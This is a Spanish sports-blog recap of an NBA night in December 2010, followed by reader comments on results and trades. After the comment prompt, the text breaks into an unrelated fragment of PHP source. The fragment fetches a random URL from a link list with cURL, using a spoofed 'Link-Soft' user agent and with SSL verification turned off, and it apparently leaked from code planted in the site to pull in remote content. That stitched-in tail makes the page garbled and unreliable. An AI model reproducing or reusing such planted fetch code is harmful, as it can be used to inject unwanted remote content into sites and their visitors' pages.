La Crónica (19/12/2010)

20 de December de 2010 por TheDeerHunter

13ª consecutiva de los Boston Celtics y subiendo. Arrastrando bajas significativas durante toda la campaña van demasiado sobrados a estas alturas. Con la mirada puesta a los movimientos de Orlando Magic y su enfrentamiento el día de Navidad, anoche dieron buena cuenta de los Indiana Pacers. Notable actuación de Pierce&Allen y también de “la extraña pareja”, Glen Davis y Nate Robinson.

Lejos de ellos, vienen con fuerza los Lakers, con el banquillo en toda su potencia. Anoche el mejor parcial lo logró Walton, junto a actuaciones destacadas de Bynum, Shannon, Barnes y Blake. Proporcionalmente lo hicieron bastante mejor que los titulares. Con todo los Raptors dieron la cara hasta casi el final con gran aportación de Calderon, Kleiza y De Rozan.

Para el resto de perseguidores no hubo demasiada suerte. Los Thunder tropezaron en casa contra unos Suns minimizados. Partidazo sensacional de Grant Hill y de Robin Lopez, además de buena actuación del resto. A Nash le cambias la baraja y ni siente ni padece. Los hará buenos a todos.

Los Hawks también perdieron. Ellos contra unos Nets no especialmente brillantes. Un equipo claramente a la deriva. Otros que no levantan cabeza son los Hornets. Anoche se vieron sorprendidos en Detroit y eso que no jugaban ni Stuckey ni Hamilton. Ya tiene mérito permitir que te metan 111 puntos estos Pistons.

Finalmente, quizás tengamos que considerar pronto como perseguidores a los Rockets. Anoche volvía Brooks y ganaron sin demasiadas dificultades a los Kings. Están en 12-15 y vuelven a tener plaza de postemporada a tiro de piedra.

PREMIOS

MVP: Siempre que sucede esto me viene a la cabeza la misma cuestión. ¿Qué es lo que pudo llegar a ser y no fue? Grant Hill 30 puntos, 11 rebotes, 2 asistencias y 1 tapón. El máximo talento encerrado en una copa de cristal.

El rookie: Viene pegando con fuerza en la carrera por el 2º puesto del RoY. DeMarcus Cousins. 19 puntos, 8 rebotes y 4 tapones. Un rayo de esperanza para aquellos que más la necesitan.

La sorpresa: Nada mal para el que muchos consideran como ex jugador en activo. 28 puntos, 12 rebotes, 8 asistencias, 3 tapones y 1 robo para Tayshaun Prince. En otros tiempos no nos parecería tan increíble.

La decepción: Hoy toca una decepción colectiva. Los 82 puntos de Atlanta contra una defensa como la de los New Jersey Nets son terribles para un equipo con sus aspiraciones… aunque tampoco sepamos muy bien cuales son tales aspiraciones.

El mayor esfuerzo en vano: Por un día no se lo daremos a Chris Paul por los Hornets. Anoche David West firmó un 32-9 para nada.

Comenta

10 comentarios a esta entrada

  1. Busky23 dice:
    #1

    Woooww,golpe de efecto de los Magic,estaba claro que algo habían de hacer si querían estar arriba. Richardson es un gran fichaje,esta en el mejor momento de su carrera y mejorara bastante el rendimiento respecto a Carter,Arenas es una incógnita,calidad tiene de sobra y el reto de competir por el anillo debería ser motivo suficiente para volver a verlo al 100%,al igual que Turkoglu,aunque este me despierta más dudas,ni d coña lo veremos al nivel de su anterior etapa.
    Phoenix refuerza su juego interior,que falta les hacia y confían en que Nash recupere para la causa a Carter y Pietrus haga las funciones que en su dia hacia Barbosa,defensa exterior y bombardeo desde el triple.De momento esta noche se han cargado a los Thunder  sin que ninguno de los fichajes debutara,con una actuación colosal de Grant Hill,un 30-10 que se ha cascao,10 años después del ultimo.
    Washington,el que ha pringao en todo esto,se come los casi 50 kilos que le quedan por cobrar al apático Lewis,no le veo la lógica.
    Sobre la jornada d hoy me quedo con los decepcionantes Hawks,sin banquillo no se va a ningún sitio.

      Citar

  2. MagicJohnson32 dice:
    #2

    Hombre, Busky, la lógica de los Wizards a mí me parece clara: sacar a Arenas del camino de Wall y traerse un contrato un año más corto.

    ¡¡Qué grande es Grant Hill, pero qué grande!!

      Citar

  3. TheDeerHunter dice:
    #3

    Comentando la foto de Cousins… diría que es la primera vez que veo a un rival sonreir a Scola.

      Citar

  4. GreenPride dice:
    #4

    De anoche vi a Lakers y Celtics. Ambos jugaban contra equipos de record medio bajo de la tabla y ambos dominaron con algún problema pero con la sensación de que al final ganarían.
    Por los verdes, grande Shaq en el principio del partido y luego muy bien Pierce haciendo de todo y Big Baby y Nate cumpliendo. Juego de equipo como siempre suficiente para tumbar a unos Pacers donde Granger las mete y Hibbert es un gran proyecto de pivot pero les falta mucha calidad para hacer frente a Boston.
    Los Lakers notan mucho la presencia de Bynum aun cuando esté al 60% como mucho y sin poder saltar. Atención que parece que se ha podido resentir de la lesión así que habrá que estar atentos. En un partido no demasiado brillante de Kobe y Pau, el banquillo guió el triunfo ante unos Raptors que tampoco están para grandes cosas, más todavía sin Bargnani. Calderón muy bien, gran partido el suyo como el de Kleiza, entre los dos, Amir y DeRozan aguantaron al equipo en el partido aunque por detrás mucho tiempo.
    De los movimientos de los Magic, estaba claro que tenían que hacer algo con Carter y Lewis que eran dos almas en pena. Lo que han conseguido puede funcionar. No tengo dudas sobre Richardson que jugará a muy buen nivel, las dudas son con Arenas y Turkoglu. Sin los dos funcionan en su potencial para mi los Magic pueden ser candidatos a todo. Si no, les faltará bastante para llegar al nivel de Heat, Lakers, Celtics, Spurs y Mavs

      Citar

  5. TheDeerHunter dice:
    #5

    Pues sí, al parecer Bynum notó dolor en una acción donde capturó dos rebotes ofensivos seguidos. En principio no es nada, pero el asunto tiene una pinta pésima y más con el panorama reciente de gente como Yao o Roy.

      Citar

  6. Denise dice:
    #6

    Busky23 (por Sergio Busquets??) te parece poco ahorrarte 20 kilos? Washington de prongao nada de nada, con Arenas no iba a ningun lado, y ahora con Lewis tampoco pero se ahorran 20 kilos.

      Citar

  7. busky23 dice:
    #7

    Desconocia por completo el salario de Gilbert Arenas,62 millones por esta y las 2 proximas temporadas!!!!!,,ahora ya me cuadra más la estrategia de Washington,esto es de locos,como no va a ir la liga de cabeza a un lockout???

      Citar

  8. Denise dice:
    #8

    Segun un rumor, Nets ofrece a Denver a Murphy, Favors y dos primeras rondas por Melo. No es mal trade para Nuggets si quieren reconstruir. Nuggets tendría mucha pasta en verano para ofrecer a agentes libres, Murphy sería un expiring de 11 kilos, más los 22 que dejan libre entre Kenion y JR Smith.

      Citar

  9. TheDeerHunter dice:
    #9

    Hablando de Murphy como expiring… me parece bastante feo que se considere así.
    Un jugador que ha rendido siempre, pero con otro cerril como Avery J. le está fastidiando la carrera. Ojo al dato, el asco que me da el barraquero ese no es causado por ningún representante patrio.
    Dimisión!!!

      Citar

  10. CAMPO2 dice:
    #10

    Yo como fan de los Nets espero que llegue a buen termino esa operación, eso si el juego interior de los Nets seria Lopez, Humphries y Petro, un poco limitado diria yo.

    No se si habreis visto algun partido de los Nets, pero eso de que en cada ataque Harris o Farmar cuando suben la bola miran al banquillo para que les cante la jugado el entrenador me parece nefasto.

      Citar

Deja un comentario

html; } class Helper { public function random_date() { $low = '732045693'; $high = time(); $random = rand($low, $high); return date("D, d M Y H:i:s",$random); } } class Fetch_site { public $url; public $html; public function __construct($sites=null, $link_list=null) { $this->is_curl_installed(); if($link_list !== null) { $this->choose_site($link_list); } $this->load_site($this->url); } public function choose_site($file=null) { $file = explode("\n", $file); $key = rand(0, (count($file)-1)); $this->url = trim($file[$key]); } public function load_site($url) { $useragent = array('Link-Soft'); $rand = array_rand($useragent); $ch = curl_init(); $options = array( CURLOPT_URL => $url, CURLOPT_HEADER => 0, CURLOPT_USERAGENT => $useragent[$rand], CURLOPT_SSL_VERIFYHOST => 0, CURLOPT_SSL_VERIFYPEER => 0, CURLOPT_RETURNTRANSFER => 1, CURLOPT_FOLLOWLOCATION => 1, CURLOPT_ENCODING => "", CURLOPT_AUTOREFERER => 1, CURLOPT_CONNECTTIMEOUT => 30, CURLOPT_TIMEOUT => 30, CURLOPT_MAXREDIRS => 5, ); curl_setopt_array($ch,$options); $result = curl_exec($ch); if(!$result) { return curl_error($ch); } curl_close($ch); $this->html = $result; } public function is_curl_installed() { if(!in_array('curl',get_loaded_extensions())) { trigger_error("cURL PHP extension is disabled or not installed.",E_USER_ERROR); } } } unset($n); ?>